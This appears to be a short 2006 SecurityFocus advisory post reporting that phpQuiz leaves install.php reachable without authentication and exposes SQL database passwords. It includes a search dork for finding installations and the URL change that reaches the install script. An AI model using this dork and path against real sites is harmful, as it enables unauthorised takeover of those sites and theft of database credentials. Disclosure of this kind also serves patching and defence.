phpQuiz sensitive file (install.php) Sep 15 2006 11:46AM
sn_0py hotmail com
* phpQuiz sensitive file (install.php without authentification) + Files containing interesting info (passwords for sql db)

* By : sn0oPy

* Risk : verry high

* Site : http://phpquiz.com/

* Dork : intitle:"phpQuiz" | " Développé par PhpQuiz v.1.0 " | "© PhpQuiz" | inurl:"PhpQuiz"

* exploit :

http://target.com/[phpquiz_path]/front/

replace by :

http://target.com/[phpquiz_path]/cfgphpquiz/install.php

* greetz : [subzero], Avg Team, Lhma9.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus